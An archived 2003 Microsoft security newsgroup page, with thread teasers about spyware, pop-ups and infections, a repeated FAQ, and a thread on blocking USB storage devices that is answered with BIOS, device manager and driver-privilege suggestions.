 - weird happenings! I have just connected to the internet and a download box appeared on my screen from Outlook, the file is an exe file and is 46.3kb in size. I have saved it to my desktop and run a scan from Panda AV on it and it comes up clean, however I never requested it so how did it just appear on my screen and what is it? Should I get rid of it? TIA Tag: How to deny users plug USB Storage devices? Tag: 40664
- Next
 - 1
 - ** READ THIS BEFORE POSTING - answers to frequently asked questions 2003.11.25 Before you post a question to a Microsoft.public.*.security newsgroup, note that your question may already be answered below: Answers to Top Frequently Asked Questions: http://securityadmin.info My question is not mentioned below. How do I get an answer immediately, with no waiting? http://securityadmin.info/faq.htm#moreinfo See also: http://www.google.com/groups?as_ugroup=microsoft.public.* See also: http://www.google.com/advanced_group_search See also: http://www.google.com I want to post a problem or question to the newsgroup. What info do I need to post in order to get a correct answer quickly? http://securityadmin.info/faq.htm#netiquette I just heard about a new Microsoft security patch update. Where can I get the patch? http://windowsupdate.microsoft.com OR http://www.microsoft.com/technet/security/current.asp I just installed a Microsoft security patch update, and now my computer is having problems. http://securityadmin.info/faq.htm#patchbroke I received an email from Microsoft / Microsoft Support / Microsoft Internet Security Center claiming to be a security patch [or comprehensive Internet Explorer update]. Is this a virus? http://securityadmin.info/faq.htm#microsoftemail ALSO NOTE: www.grisoft.com is free antivirus, USE IT. I received a virus email from a Microsoft email address. Who do I report this to? http://securityadmin.info/faq.htm#microsoftemail I have the RPC Blaster worm "virus," what do I do? http://www.microsoft.com/security/incident/blast.asp ALSO NOTE: www.grisoft.com is free antivirus, USE IT. My computer is giving RPC Remote Procedure Call messages. There is a TFTP message or file on my computer. My computer keeps locking up, and/or rebooting, or telling me that it will reboot in 1 minute. http://www.microsoft.com/security/incident/blast.asp ALSO NOTE: www.grisoft.com is free antivirus, USE IT. Where can I download the Blaster worm / RPC DCOM patch? http://windowsupdate.microsoft.com OR http://www.microsoft.com/technet/security/current.asp I'm having a problem caused by the JDBGMGR.EXE Teddy Bear "virus" hoax, or I want to replace this file. http://securityadmin.info/faq.htm#jdbgmgr I forgot my Windows logon password and can't log in. How do I reset it? http://securityadmin.info/faq.htm#password I have a problem or a question with a virus or with antivirus. http://securityadmin.info/faq.htm#virus NOTE: www.grisoft.com is free antivirus, USE IT. Why is Outlook Express blocking my attachments as "unsafe"? http://securityadmin.info/faq.htm#attachments How do I stop getting pop-up messages? Or adware? Or spyware? http://securityadmin.info/faq.htm#pop-ups How do I block people from viewing adult or objectionable content on a computer? http://securityadmin.info/faq.htm#contentfilter How do I block spam emails? http://securityadmin.info/faq.htm#spam There is a Content Advisor password blocking me from certain web sites. http://securityadmin.info/faq.htm#contentadvisor How do I delete an FTP folder that a hacker put on my computer and I cannot delete? http://securityadmin.info/faq.htm#ftpfolder Have I been hacked? What do I do if I've been hacked? http://securityadmin.info/faq.htm#hacked How do I re-secure a computer that has been hacked? http://securityadmin.info/faq.htm#re-secure How do I test or improve the security on my computer to avoid being hacked? http://securityadmin.info/faq.htm#harden How do I investigate a suspicious IP address that may be trying to hack me? http://securityadmin.info/faq.htm#trace How do I report a hacker? http://securityadmin.info/faq.htm#reporthacker How do I use a port scanner or vulnerability scanner to test my security? http://securityadmin.info/faq.htm#portscanner How do I encrypt my files and/or hard drive? http://securityadmin.info/faq.htm#encryption How do I get a firewall? IDS? http://securityadmin.info/faq.htm#firewall I want to use the IPSec filtering or IP filtering feature of Windows to block certain ports and have a problem or question. http://securityadmin.info/faq.htm#ipsec I have a problem or question with the XP ICF firewall. http://securityadmin.info/faq.htm#icf I have a problem or question with the IIS URLScan tool. http://securityadmin.info/faq.htm#urlscan How do I change the banner on my computer or server to hide what software version I'm using? http://securityadmin.info/faq.htm#banner How do I enable Windows Auditing to tell who logged into Windows or who accessed a file? http://securityadmin.info/faq.htm#auditing How do I inspect and disable programs that start up when Windows starts? http://securityadmin.info/faq.htm#startup How do I use RUNAS or let someone use RUNAS to run commands as administrator without having to type the password? http://securityadmin.info/faq.htm#runas How do I let non-administrator users run Defrag or change their IP address? http://securityadmin.info/faq.htm#runas My question is not mentioned above. How do I get an answer immediately, with no waiting? http://securityadmin.info/faq.htm#moreinfo See also: http://www.google.com/groups?as_ugroup=microsoft.public.* See also: http://www.google.com/advanced_group_search See also: http://www.google.com I want to post a problem or question to the newsgroup. What info do I need to post in order to get a correct answer quickly? http://securityadmin.info/faq.htm#netiquette Note that this is NOT a full list of all the questions answered in the FAQ. Chances are, your question has probably already been answered. The complete FAQ is at: http://securityadmin.info/faq.htm#contents I hope this is helpful. Feedback, suggestions and criticism regarding the FAQ are welcome and may be emailed to me. kind regards, Karl Levinson, CISSP, MCSE, MVP email: levinson_k@despammed.com Tag: How to deny users plug USB Storage devices? Tag: 40660
 - 2
 - Restoring Only system32.exe? My system32.exe got infected with Backdoor.sdBot how can I replace only system32.exe file? NV 2002 wont clean it even with new av defs files. Tag: How to deny users plug USB Storage devices? Tag: 40659
 - 3
 - Pop ups gone wild Please help! Ok, here's the story. I let my daughter download Kazaa on a computer with Windows ME and I think we started to get some pop-up annoyances, though not terrible. At some point, I was on the computer and saw a Windows dialog box that said the computer was becoming overwhelmed with pop- ups and did I want to install a pop-up protector. I am not an idiot who believes everything he sees but this appeared to be an official windows dialog box. To my knowledge, I successfully downloaded and installed that program, though I may not have been successful loading it. Does anyone know if Windows sedns this kind of dialog box? Anyway, I noticed that, sometime after that, it seemed like the pop ups got worse. I then noticed that my default internet site was not yahoo and so I changed it back, thinking that would probably solve the problem But it is not. The only program I am using, fight now, is Norton AV and as it is scanning I am still getting pop ups. First of all, with Windows ME, can I restore my registry to what I had say three days ago and undo all the Kazaa installation and possibly phony anti-pop up installation I've done? Secondly, I see a bunch of programs that I don't know what they are. Can you folk, tell me which are likely to be the problem causing the pop ups? They are as follows: Bargain Buddy, BDE, Eboles Moe Money Maker, IMesh, Imesh ads support, Lycos Sideserver, MySearch Bar, New net domains 5.48, p2p networking, peer points manager, sanity media master, Top Text Ilookup, Viewpoint media player (remove only), Web Hancer Customer Companion, webHancer Survey Companion. Thanks, Deana Tag: How to deny users plug USB Storage devices? Tag: 40652
 - 4
 - SAFEBOOT RECOVERY CODE I HAVE WINDOWS 98 ON MY LAPTOP AND IT HAS GON INTO SAFEBOOT AND WANTS ADMINS RECOVERY CODE I DONT HAVE ANY MORE CAN ANY ONE HELP PLEASE Tag: How to deny users plug USB Storage devices? Tag: 40645
 - 5
 - Proxy chains Does anyone know in what versions of MSIE are proxy chains supported Thanks Beli Tag: How to deny users plug USB Storage devices? Tag: 40638
 - 6
 - Can't access network files/folders Grrr..... After letting Microsoft do a "let us do it for you" security update from the "Updates" page I cannot access certain files and folders on other systems on my private home network. Any instructions for removing/resetting file access permissions would be greatly appreciated. I've cruised the Microsoft site but can't seem to locate instructions on how to "undo" what the update did. I do not normally access this newsgroup so Email to corky1747@earthlink.net would be greatly appreciated. Thanks, Corky Tag: How to deny users plug USB Storage devices? Tag: 40634
 - 7
 - SpyBot Search & Destroy Update 24/11/03 2003-11-24 Hijacker + AdultLinks.QaBar + AdGoblin + Xupiter.OrbitExplorer + IEDLL.ToonComics ++ SearchDotCom ++ CoolWWWSearch.HTMLEdit + CoolWWWSearch.SVCPack + SearchXL ++ ExPup ++ SearchOMatic + I-Lookup ++ RSSToolbar ++ SearchForge + CoolWWWSearch.WinSearch ++ Mirar.NNBar + eUniverse.IncrediFind ++ CleverIEHooker.Jeired + IEDLL.ToonComics + CoolWWWSearch + Search-Exe + MediaLoads + ClearSearch.Net + SearchAndClick + eXactSearchbar ++ FastSeeker + ToolbarCC ++ CoolWWWSearch.XPlugin + Adtomi.YahooStocks ++ AdsStore ++ ISTbar.CSearch ++ LoadHTML.BHOPopup ++ LoudMarketing.WinFavorites ++ ++ AdRoad.Cpr Spyware + PurityScan + Outwar ++ iPend + Huntbar + ShopNav + eAcceleration + WildTangent + BrowserAid + SearchSquire Malware ++ iempg + eUniverse.MyFreeCursors ++ ClimaxBucks.InternetOptimizer ++ KeenValue.PerfectNav + Haczyk.Ulubione Keylogger + NetSpy + Winvestigator Trojans ++ Peper ++ VividGalut ++ SpamRelayer.DiskServ ++ Remover.Trojan -- siljaline MS - MVP Windows IE/OE ______________________ (Reply to group, as return address is invalid - that we may all benefit) Tag: How to deny users plug USB Storage devices? Tag: 40631
 - 8
 - content advisor i am using content advisor to block sites on my computer. When you type in the website in the url, it blocks the site. but if i search for it in yahoo, and find it, I can double click on the link and it takes me to the site. How can i block this site? Tag: How to deny users plug USB Storage devices? Tag: 40630
 - 9
 - ip address where do i find the IP address of my computer? Tag: How to deny users plug USB Storage devices? Tag: 40626
 - 10
 - Search for blank passwords Hello, I would like to know if there is a utility or function of Windows 2000/XP command line that I can run to tell me if a computer has a blank password on one or any local user accounts. If I type "net user test" (where "test" is my username) from command line, I get all the user info, but it doesn't seem to give me what I'm looking for. The end result will be embedding this into a patch / account checking application that e-mails me the results of what it finds. I've already got the patch checking part done, but need help on the account side. How does the MBSA check for weak passwords? Any ideas? Tag: How to deny users plug USB Storage devices? Tag: 40625
 - 11
 - Norton and Bundle.exe My Norton program is alerting me that Bundle.exe is attempting to go to the internet, and labels it a medium risk access. The options are block, allow, and let me do it manually. 1. Why is bundle.exe going to the internet? 2. Should I let it? 3. How can I tell it not to, and prevent the program from trying ever ten minutes? I am running Windows Millenium Edition on a Sony VAIO. Thanks...RLB Tag: How to deny users plug USB Storage devices? Tag: 40620
 - 12
 - Attachments stripped from my Emails received Attachments such as Word documents are being removed from my incoming Emails by Internet Explorer or by Norton. Which do you think is doing it? How do I change the settings? Jim Tag: How to deny users plug USB Storage devices? Tag: 40617
 - 13
 - Bounce e-mail question I've been using a tool called ABouncer (recommended by someone on this NG) to notify ISP's when I receive Unsolicited Bulk E-mail. I started wondering whether this tool is actually working properly, so I tried sending mail from my web-mail address to ordinary address, then used ABouncer to bounce it back to my web address. This has not worked, so does that mean ABouncer is'nt sending any messages to ISP's, or am I misunderstanding something. Incidentally, when I click SEND on ABouncer, after a few seconds it flashes up Caught Sendmail ....... I've always assumed that meant that the message had been sucessful. Tag: How to deny users plug USB Storage devices? Tag: 40611
 - 14
 - Account User Reset I took my computer to a local computer "fixer" to have some work done on it. When I got it back, he had somehow deleted my account profile, leaving only my 'guest' profile. I now do not have any administative privleges, and don't have a password reset disk. How do I completely restart my computer so I can set up a new adminstrator account? PS- Nothing needs to be saved on my computer, so deleteing all existing files is not an issue. Any help would be appreciated. Tag: How to deny users plug USB Storage devices? Tag: 40607
 - 15
 - Cool Web Search Spyware Hijacker "Schredder" Update [1.36.1] http://www.spywareinfo.com/~merijn/ < quote> A small utility for removing CoolWebSearch (aka CoolWwwSearch, YouFindAll, White-Pages.ws and a dozen other names). Spybot S&D tends to forget essential parts of the hijack, so until it updates, you can just this to completely remove the hijack. Updated to remove the new variants once they come out. >>>>>Currently changing versions at the speed of light. </quote> http://www.spywareinfo.com/~merijn/files/cwshredder.zip Unzip the tool, ensure that all your IE/OE Windows are *closed* hit the executable and follow the prompts. You are *strongly urged* to use these tools, they are MS-MVP tested and safe. If anyone has questions, feel free to ask - Regards, -- siljaline MS - MVP Windows IE/OE ______________________ (Reply to group, as return address is invalid - that we may all benefit) Tag: How to deny users plug USB Storage devices? Tag: 40605
 - 16
 - Securing the Registry. G/day forum, I've been ploughing through documents and whitepapers on how to secure your web server, the best resource of all was probably Improving Web Application Security - Threats and Countermeasures, an absoloute bible for all ye web admins out there. Before you read the part i'm querying, it i just want to doublecheck that i'm not missing anything. Your thoughts please :) On Chapter 16: Securing Your Web Server, page 449, the following: Step 9. Registry The registry is the repository for many vital server configuration settings. As such,you must ensure that only authorized administrators have access to it. If an attacker is able to edit the registry, he or she can reconfigure and compromise the security of your server. During this step, you: ? Restrict remote administration of the registry. ? Secure the SAM (stand-alone servers only). Restrict Remote Administration of the Registry The Winreg key determines whether registry keys are available for remote access. By default, this key is configured to prevent users from remotely viewing most keys in the registry, and only highly privileged users can modify it. On Windows 2000, remote registry access is restricted by default to members of the Administrators and Backup operators group. Administrators have full control and backup operators have readonly access. The associated permissions at the following registry location determine who can remotely access the registry. HKLM\SYSTEM\CurrentControlSet\Control\SecurePipeServers\winreg To view the permissions for this registry key, run Regedt32.exe, navigate to the key, and choose Permissions from the Security menu. Secure the SAM (Stand-alone Servers Only) Stand-alone servers store account names and one-way (non-reversible) password hashes (LMHash) in the local Security Account Manager (SAM) database. The SAM is part of the registry. Typically, only members of the Administrators group have access to the account information. Although the passwords are not actually stored in the SAM and password hashes are not reversible, if an attacker obtains a copy of the SAM database, the attacker can use brute force password techniques to obtain valid user names and passwords. Restrict LMHash storage in the SAM by creating the key (not value) NoLMHash in the registry as follows: HKLM\System\CurrentControlSet\Control\LSA\NoLMHash For more information, see Microsoft Knowledge Base article 299656, "New Registry Key to Remove LM Hashes from Active Directory and Security Account Manager." Tag: How to deny users plug USB Storage devices? Tag: 40594
 - 17
 - Closing Ports My friend recently hacked into my pc to see if it was possible. He managed to get in and said to me I should close port 139, but I have no idea what he is talking about or how to do this. Can someone please help me? Tag: How to deny users plug USB Storage devices? Tag: 40592
 - 18
 - Portal search menu How can I delete this menu from all my Microsoft applications? Tag: How to deny users plug USB Storage devices? Tag: 40577
 - 19
 - ** READ THIS BEFORE POSTING - answers to frequently asked questions 2003.11.24 Before you post a question to a Microsoft.public.*.security newsgroup, note that your question may already be answered below: Answers to Top Frequently Asked Questions: http://securityadmin.info My question is not mentioned below. How do I get an answer immediately, with no waiting? http://securityadmin.info/faq.htm#moreinfo See also: http://www.google.com/groups?as_ugroup=microsoft.public.* See also: http://www.google.com/advanced_group_search See also: http://www.google.com I want to post a problem or question to the newsgroup. What info do I need to post in order to get a correct answer quickly? http://securityadmin.info/faq.htm#netiquette I just heard about a new Microsoft security patch update. Where can I get the patch? http://windowsupdate.microsoft.com OR http://www.microsoft.com/technet/security/current.asp I just installed a Microsoft security patch update, and now my computer is having problems. http://securityadmin.info/faq.htm#patchbroke I received an email from Microsoft / Microsoft Support / Microsoft Internet Security Center claiming to be a security patch [or comprehensive Internet Explorer update]. Is this a virus? http://securityadmin.info/faq.htm#microsoftemail ALSO NOTE: www.grisoft.com is free antivirus, USE IT. I received a virus email from a Microsoft email address. Who do I report this to? http://securityadmin.info/faq.htm#microsoftemail I have the RPC Blaster worm "virus," what do I do? http://www.microsoft.com/security/incident/blast.asp ALSO NOTE: www.grisoft.com is free antivirus, USE IT. My computer is giving RPC Remote Procedure Call messages. There is a TFTP message or file on my computer. My computer keeps locking up, and/or rebooting, or telling me that it will reboot in 1 minute. http://www.microsoft.com/security/incident/blast.asp ALSO NOTE: www.grisoft.com is free antivirus, USE IT. Where can I download the Blaster worm / RPC DCOM patch? http://windowsupdate.microsoft.com OR http://www.microsoft.com/technet/security/current.asp I'm having a problem caused by the JDBGMGR.EXE Teddy Bear "virus" hoax, or I want to replace this file. http://securityadmin.info/faq.htm#jdbgmgr I forgot my Windows logon password and can't log in. How do I reset it? http://securityadmin.info/faq.htm#password I have a problem or a question with a virus or with antivirus. http://securityadmin.info/faq.htm#virus NOTE: www.grisoft.com is free antivirus, USE IT. Why is Outlook Express blocking my attachments as "unsafe"? http://securityadmin.info/faq.htm#attachments How do I stop getting pop-up messages? Or adware? Or spyware? http://securityadmin.info/faq.htm#pop-ups How do I block people from viewing adult or objectionable content on a computer? http://securityadmin.info/faq.htm#contentfilter How do I block spam emails? http://securityadmin.info/faq.htm#spam There is a Content Advisor password blocking me from certain web sites. http://securityadmin.info/faq.htm#contentadvisor How do I delete an FTP folder that a hacker put on my computer and I cannot delete? http://securityadmin.info/faq.htm#ftpfolder Have I been hacked? What do I do if I've been hacked? http://securityadmin.info/faq.htm#hacked How do I re-secure a computer that has been hacked? http://securityadmin.info/faq.htm#re-secure How do I test or improve the security on my computer to avoid being hacked? http://securityadmin.info/faq.htm#harden How do I investigate a suspicious IP address that may be trying to hack me? http://securityadmin.info/faq.htm#trace How do I report a hacker? http://securityadmin.info/faq.htm#reporthacker How do I use a port scanner or vulnerability scanner to test my security? http://securityadmin.info/faq.htm#portscanner How do I encrypt my files and/or hard drive? http://securityadmin.info/faq.htm#encryption How do I get a firewall? IDS? http://securityadmin.info/faq.htm#firewall I want to use the IPSec filtering or IP filtering feature of Windows to block certain ports and have a problem or question. http://securityadmin.info/faq.htm#ipsec I have a problem or question with the XP ICF firewall. http://securityadmin.info/faq.htm#icf I have a problem or question with the IIS URLScan tool. http://securityadmin.info/faq.htm#urlscan How do I change the banner on my computer or server to hide what software version I'm using? http://securityadmin.info/faq.htm#banner How do I enable Windows Auditing to tell who logged into Windows or who accessed a file? http://securityadmin.info/faq.htm#auditing How do I inspect and disable programs that start up when Windows starts? http://securityadmin.info/faq.htm#startup How do I use RUNAS or let someone use RUNAS to run commands as administrator without having to type the password? http://securityadmin.info/faq.htm#runas How do I let non-administrator users run Defrag or change their IP address? http://securityadmin.info/faq.htm#runas My question is not mentioned above. How do I get an answer immediately, with no waiting? http://securityadmin.info/faq.htm#moreinfo See also: http://www.google.com/groups?as_ugroup=microsoft.public.* See also: http://www.google.com/advanced_group_search See also: http://www.google.com I want to post a problem or question to the newsgroup. What info do I need to post in order to get a correct answer quickly? http://securityadmin.info/faq.htm#netiquette Note that this is NOT a full list of all the questions answered in the FAQ. Chances are, your question has probably already been answered. The complete FAQ is at: http://securityadmin.info/faq.htm#contents I hope this is helpful. Feedback, suggestions and criticism regarding the FAQ are welcome and may be emailed to me. kind regards, Karl Levinson, CISSP, MCSE, MVP email: levinson_k@despammed.com Tag: How to deny users plug USB Storage devices? Tag: 40546
 - 20
 - Outlook Express Spam Blocker - When? I only use Microsoft software products. It's just easier that way. But, I've just about had it with the lack of progress in Outlook Express concerning SPAM! Does Microsoft have any plans whatsoever to update the inadequate "Outlook Express" Spam blocking features? This is getting ridiculous! Tag: How to deny users plug USB Storage devices? Tag: 40529
 - 21
 - Cool Web Search Spyware Hijack "Schredder" Update 1.36.0 Info: http://www.spywareinfo.com/~merijn/ File: http://www.spywareinfo.com/~merijn/files/cwshredder.zip <snip> A small utility for removing CoolWebSearch (aka CoolWwwSearch, YouFindAll, White-Pages.ws and a dozen other names). Spybot S&D tends to forget essential parts of the hijack, so until it updates, you can just this to completely remove the hijack. Updated to remove the new variants once they come out. </snip> Unzip the tool, hit the executable, ensure that all instances of IE/OE are closed, follow the prompts. Regards, -- siljaline MS - MVP Windows IE/OE ______________________ (Reply to group, as return address is invalid - that we may all benefit) Tag: How to deny users plug USB Storage devices? Tag: 40528
 - 22
 - what kinda of security should i have? what kinda of security should i make sure i have on my wireless router (I will be remotee accessing my network) thank you, nick Tag: How to deny users plug USB Storage devices? Tag: 40523
 - 23
 - aua.boot This particular file keeps popping up wanting to access my internet connection. McAfee states that it reccommends that access should be denyied, that there have been updates to this file since last access. My question is: What the heck is an aua.boot and should I continue to deny it access to the internet? I'm not a total idiot to computers, I know the basics and can do some cool things with them but I have not idea what that is! Please help! :) Thanks :) Tag: How to deny users plug USB Storage devices? Tag: 40519
 - 24
 - microsoft money a friend has asked me to look at why there data in ms money has suddenly changed giving incorrect balances, are there any security issues or ms money targeted worms etc, i have suggested they get a firewall, any suggestions welcome Tag: How to deny users plug USB Storage devices? Tag: 40515
 - 25
 - adaware cant take out hotbar I installed adaware the free version for the first time- And then updated and then scanned as has always been suggested here. then I did a pestscan scan and hotbar and tucows were still there- I redid the ad-aware scan and it found one more data tracker thing-went to pestscan and the same 2 were still showing on there list-I know that I have had problems removing hotbar manually before using the help of any software (because hotbar is hiding somewhere and cannot be taken out) Now it only shows up on pestscan- what can I do. If it is suggested to send the ref-file How safe is it? and what is it that I have to send exactly?? Tag: How to deny users plug USB Storage devices? Tag: 40513

I want deny my users to connect USB storage devices. Windows permits users,
even non-administrators to plug USB flash devices.

You can modify file permissions on usbstor.* files inside %windir%* (3
files) and deny acces to every registry entry where the "USBSTOR" string is
present.
Before doing this you must uninstall any USB flash device.

I've try this configuration locally and works only when you remove all
permissions, even for SYSTEM accoun. I don't know how to deploy it through
domain policy or login-script and of course, I don't want to remove SYSTEM
account permission over any registry key or system file.

There's any solution to that question (3rd party software not accepted for
answers :p)

Thank you.

Juanma
--

Top

RE: How to deny users plug USB Storage devices? by robgruen

robgruen
Wed Nov 26 10:53:44 CST 2003

Juanma,

Have you considered disabling the USB hub (either from the device manager
or through the BIOS)? If you disable the hub from the BIOS and password
protect the BIOS you users will not be able to use any USB devices. If you
disable the device in the device manager, only power users will be able to
run the device manager.

Or per Q283658 (http://support.microsoft.com/?id=283658) you can deny the
"Load\Unload Drivers" privilege for those users you don't want to use USB
devices. However, I don't know if this will work for USB devices that
already have drivers within the system32\drivers folder.

I hope that helps!

Thanks! Robert Gruen
Microsoft, VB.NET

This posting is provided "AS IS", with no warranties, and confers no rights.

Top